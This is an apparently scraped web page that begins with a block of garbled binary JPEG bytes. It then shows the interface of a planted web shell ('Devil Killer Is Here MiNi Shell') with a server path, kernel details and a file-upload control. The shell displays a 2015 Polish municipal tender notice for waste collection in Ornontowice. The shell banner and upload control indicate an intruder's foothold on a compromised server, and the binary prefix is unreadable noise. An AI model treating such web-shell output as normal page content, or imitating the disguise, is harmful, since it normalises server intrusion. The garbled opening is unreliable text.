JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150917/243640-N-2015.html

<p class="kh_header"><b>Ornontowice: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI, NA KTÓRYCH ZAMIESZKUJĄ MIESZKAŃCY W GMINIE ORNONTOWICE</b><br>
<b>Numer ogłoszenia: 243640 - 2015; data zamieszczenia: 17.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Zasobami Gminy , ul. Zwycięstwa 26a, 43-178 Ornontowice, woj. śląskie, tel. 032 2354545, faks 032 2354545.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgzg.ornontowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI, NA KTÓRYCH ZAMIESZKUJĄ MIESZKAŃCY W GMINIE ORNONTOWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy w Gminie Ornontowice.

Lokalizację ulic na terenie Gminy Ornontowice przedstawia mapa stanowiąca załącznik nr 10 do SIWZ.
Liczba mieszkańców, którzy będą objęci usługą odbierania odpadów komunalnych 
w Gminie Ornontowice będzie wynosić około 6 000 (5 931 stan osób zameldowanych na dzień 31.08.2015r.). 
W oparciu o złożone deklaracje 4 283 mieszkańców zamieszkuje zabudowę jednorodzinną a 1 350 wielorodzinną. Liczba mieszkańców ulega ciągłym zmianom.
Orientacyjna liczba punktów gromadzenia odpadów w zabudowie jednorodzinnej szacunkowo wynosi około 1138. Liczba punktów gromadzenia odpadów w zabudowie wielorodzinnej wynosi 10. 
Liczby wymienione powyżej nie uwzględniają mogących powstać nowych ulic i budynków mieszkalnych, jak również nie uwzględniają likwidacji budynków i zmian liczby mieszkańców w czasie realizacji przedmiotu zamówienia.
Wszystkie nowo powstające nieruchomości zamieszkałe powinny być objęte usługą odbioru 
i zagospodarowania odpadów.

Przedmiot zamówienia obejmuje: 
1.	Odbiór i zagospodarowanie wszystkich wytwarzanych na terenie Gminy Ornontowice odpadów komunalnych pochodzących z nieruchomości, na których zamieszkują mieszkańcy w Gminie Ornontowice, jako wykonanie obowiązków wynikających z ustawy z dnia 13 września 1996r. 
o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013r., poz. 1399. z późn. zm.):
	bezpośrednio z nieruchomości, na których zamieszkują mieszkańcy:
a)	zmieszane odpady komunalne,
b)	szkło,
c)	tworzywa sztuczne, odpady wielomateriałowe, metal,
d)	papier i tektura,
e)	odpady ulegające biodegradacji,
f)	odpady wielkogabarytowe,
g)	zużyte opony.
	z punktu selektywnego zbierania odpadów komunalnych (PSZOK):
a)	szkło,
b)	tworzywa sztuczne, odpady wielomateriałowe, metal,
c)	papier i tektura,
d)	odpady ulegające biodegradacji, w tym opakowania ulegające biodegradacji,
e)	odpady zielone, 
f)	odpady wielkogabarytowe,
g)	zużyte opony,
h)	zużyty sprzęt elektryczny i elektroniczny,
i)	odpady remontowo-budowlane ze strumienia odpadów komunalnych,
j)	przeterminowane leki,
k)	chemikalia i inne odpady niebezpieczne ze strumienia odpadów komunalnych z grupy 20, zgodnie 
z Rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014r. w sprawie katalogu odpadów (Dz. U. poz. 1923),
l)	zużyte baterie i akumulatory.

Na czas świadczenia usługi wykonawca bezpłatnie wydzierżawia pojemniki przeznaczone na odpady komunalne zmieszane oraz przeznaczone do selektywnej zbiórki odpadów, których rodzaj oraz ilości zostały opisane poniżej. Odpowiada on również za ich stan sanitarny i techniczny. W przypadku ich uszkodzenia, zniszczenia, spalenia, kradzieży lub innej przyczyny uniemożliwiającej prawidłowe wykonywanie usługi odbioru odpadów w danym punkcie gromadzenia odpadów - Wykonawca zobowiązany jest niezwłocznie wymienić lub uzupełnić brakujący pojemnik, nie później jednak niż w terminie 3 dni od zgłoszenia przez Zamawiającego. W przypadku braku wymiany lub uzupełnienia pojemnika mają zastosowanie zapisy 
par. 11 pkt. 1.1. umowy - Kary umowne.

2.	Wyposażenie wszystkich właścicieli nieruchomości, na których zamieszkują mieszkańcy w zabudowie jednorodzinnej w pojemniki na odpady komunalne zmieszane oraz worki przeznaczone do zbierania odpadów segregowanych. 
Orientacyjna ilość pojemników o poj. 120l wynosi 1540 szt 

3.	Wyposażenie punktów gromadzenia odpadów (śmietników) na terenie zabudowy wielorodzinnej  (bloki) w pojemniki na odpady komunalne zmieszane oraz w pojemniki do selektywnej zbiórki odpadów (zestawy). Orientacyjna ilość pojemników na odpady zmieszane o poj. 1,1m3 wynosi 43 szt.
Wykonawca jest zobowiązany wyposażyć zabudowę wielorodzinną w pojemniki przeznaczone do zbierania odpadów segregowanych w następujących ilościach i pojemnościach:
a)	typ Igloo (system HDS) w kolorze zielonym na szkło białe i kolorowe: 
- 14 szt. o poj. 2,5m3,  
b)	typ Eko siatkowe (system HDS) w kolorze żółtym na tworzywa sztuczne, odpady wielomateriałowe oraz metal: 
- 16 szt. o poj. 2,5m3,   
c)	typ Igloo (system HDS) w kolorze niebieskim na papier i tekturę: 
- 16 szt. o poj. 2,5m3,
d)	brązowe wykonane z plastiku na odpady ulegające biodegradacji: 
- 22 szt. o poj. 1,1m3,  


4.	Wyposażenie punktu selektywnego zbierania odpadów komunalnych (PSZOK) zlokalizowanego na terenie Gminy Ornontowice w odpowiednie pojemniki:
5.1.	typ Igloo (system HDS) w kolorze zielonym na szkło białe i kolorowe - 1 szt. o poj. 2,5m3,  
5.2.	typ Eko siatkowe (system HDS) w kolorze żółtym na tworzywa sztuczne, odpady wielomateriałowe oraz metal: - 1 szt. o poj. 2,5m3,   
5.3. typ Igloo (system HDS) w kolorze niebieskim na papier i tekturę - 2 szt. o poj. 2,5m3,  
5.4. KP 3 na metal - 1 szt.,
5.5. KP 7 na odpady ulegające biodegradacji (w tym opakowania ulegające biodegradacji) - 1 szt.,
5.6. KP 7 na odpady zielone - 1 szt.,
5.7. 36 m3 na odpady wielkogabarytowe - 1 szt.,
5.8. KP 3 na zużyty sprzęt elektryczny i elektroniczny - 2 szt.,
5.9. KP 5 na odpady remontowo-budowlane ze strumienia odpadów komunalnych 
- 1 szt.,
5.10. pojemnik na przeterminowane leki - 1 szt.,
5.11. 1,1m3 na chemikalia i inne odpady niebezpieczne - 1 szt.,
5.12. pojemnik na zużyte baterie - 1 szt.,
5.13. pojemnik na świetlówki - 1 szt.,
5.14. palety na akumulatory - 3 szt.,
5.15. palety na opony - 3 szt.,
5.16. pojemniki z tworzywa sztucznego z wiekiem o poj. 240l na odpady niebezpieczne ze strumienia odpadów komunalnych z grupy 20, zgodnie z Rozporządzeniem Ministra Środowiska 
z dnia 9 grudnia 2014r. w sprawie katalogu odpadów (Dz. U. poz. 1923) w opakowaniach tubkowych, szklanych, metalowych i tworzyw sztucznych - 3 szt.,
oraz odbiór po telefonicznym zgłoszeniu Zamawiającego i dalsze zagospodarowanie zgromadzonych odpadów. Odbiór, transport i zagospodarowanie poszczególnych rodzajów odpadów komunalnych 
z punktu selektywnego zbierania odpadów musi być zgodne z obowiązującymi w tym zakresie przepisami prawa ze szczególnym uwzględnieniem procesu odzysku odpadów.

Zamawiający we własnym zakresie zapewnia obsługę Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK), który znajduje się przy ul. Grabowej.

5.	Wyposażenie terenu Gminy w pojemniki KP 7 na odpady zielone przeznaczone dla mieszkańców - 3 szt. 
  
6.	Wyposażenie wyszczególnionych budynków w odpowiednie pojemniki na zużyte baterie służące mieszkańcom Gminy:
7.1. urząd gminy - 1 szt.,
7.2. ośrodek zdrowia - 1szt.,
7.3. zespół szkolno-przedszkolny - 1 szt.,
7.4. gimnazjum - 1 szt..

7.	Odbiór przeterminowanych i nieprzydatnych lekarstw z pojemnika umieszczonego w budynku Gminnego Ośrodka Zdrowia przy ul. Klasztornej 1, służącego mieszkańcom Gminy. 
8.	Odbiór przeterminowanych i nieprzydatnych lekarstw pozostawionych przez mieszkańców 
w dwóch aptekach działających na terenie Gminy przy ul. Klasztornej 3 i Zwycięstwa 4. 
9.	Zorganizowanie odbioru i odzysku odpadów wielkogabarytowych w ramach akcji wystawka jeden raz w roku dla zabudowy jednorodzinnej i wielorodzinnej w terminach ustalonych każdorazowo 
z Zamawiającym.
 
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 8 do specyfikacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.12.00-4, 90.51.13.00-5, 90.51.20.00-9, 90.53.30.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 12 000 zł.
	Słownie złotych:  dwanaście tysięcy.
1.1.	 	Wadium może być wniesione w:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1.1.Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na odbieraniu odpadów komunalnych od właścicieli nieruchomości zgodnie z przepisami ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. z 2013 r. poz. 1399 z późn. zm.), gospodarowaniu odpadami komunalnymi zgodnie z przepisami ustawy z dnia 14.12.2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 
z późn. zm.), zbieraniu zużytego sprzętu zgodnie z przepisami ustawy z dnia 29.07.2005 r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2013 r., poz. 1155 z późn. zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 usługi  polegającą na odbieraniu odpadów komunalnych i, lub prowadzeniu selektywnej zbiórki odpadów (tj. odbieranie odpadów zbieranych do oddzielnych, specjalnie do tego celu przeznaczonych pojemników i, lub worków) na  kwotę min.  500 000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać, że: dysponuje lub będzie dysponował co najmniej:
a) 2 samochodami  - śmieciarkami do odbioru odpadów gromadzonych w pojemnikach o pojemności od 120l do 1100l, 
b) 1 samochodem - śmieciarką do odbioru odpadów gromadzonych w pojemnikach o pojemności od 120l do 1100l umożliwiającym odbiór odpadów z drugiej oraz kolejnych linii zabudowy mieszkaniowej -                          (tonaż samochodu umożliwiający łatwość manewrowania w miejscach  zwartej zabudowy i oddalonej od drogi publicznej),   
c) 1 samochodem przystosowanym do odbioru odpadów wielkogabarytowych lub odpadów umieszczonych                 w workach,
d)  1 samochodem przystosowanym do odbioru odpadów umieszczonych w workach umożliwiającym odbiór tych odpadów z drugiej oraz kolejnych linii zabudowy mieszkaniowej - (tonaż samochodu umożliwiający łatwość manewrowania w miejscach  zwartej zabudowy i oddalonej od drogi publicznej),
e)  1 samochodem samozaładowczym z systemem HDS,
f)  1 samochodem o zabudowie hakowej 
g) 1 samochodem o zabudowie bramowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wpis do rejestru działalności regulowanej  w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu  Gminy Ornontowice,
b)	zezwolenie  na transport odpadów wydane przez  właściwy organ,  zgodnie z ustawą o odpadach.
c) Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ. Oświadczenie, że przedmiot oferty jest zgodny z przedmiotem zamówienia
d) Pełnomocnictwo ustanowione do reprezentowania Wykonawcy(ów) ubiegającego(cych) się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin platności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony dopuszczają zmianę istotnych postanowień niniejszej umowy, zgodnie
z artykułem 144 ustawy Prawo zamówień publicznych w przypadku wystąpienia następujących okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy tj.:
1.1.	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
1.2.	wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
1.3.	niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności wypadku losowego, nieprzewidzianej zmiany organizacyjnej),
1.4.	zmiana sposobu selektywnej zbiórki odpadów, zatwierdzonej przez Zamawiającego, 
w przypadku braku osiągania zamierzonych efektów, lub w przypadku gdy system lub jego elementy nie funkcjonują w sposób prawidłowy,
1.5.	zmiana w trakcie realizacji przedmiotu umowy formy zabezpieczenia należytego wykonania umowy zgodnie z par. 9 ust.1 przez Wykonawcę,
1.6.	zmiana instalacji do zagospodarowania odpadów,
1.7.	wprowadzenie podwykonawcy, rezygnacja z podwykonawcy, zmiana zakresu rzeczowego wykonywanego przy pomocy podwykonawcy. 
2.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
2.1.	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy 
(np. zmiana nr rachunku bankowego),
2.2.	zmiany danych teleadresowych,
2.3.	zwiększenie lub zmniejszenie liczby ulic, budynków, punktów gromadzenia odpadów 
i liczby mieszkańców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgzg.ornontowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Zasobami Gminy
ul. Zwycięstwa 26a
43-178 Ornontowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2015 godzina 12:00, miejsce: Zakład Gospodarki Zasobami Gminy
ul. Zwycięstwa 26a
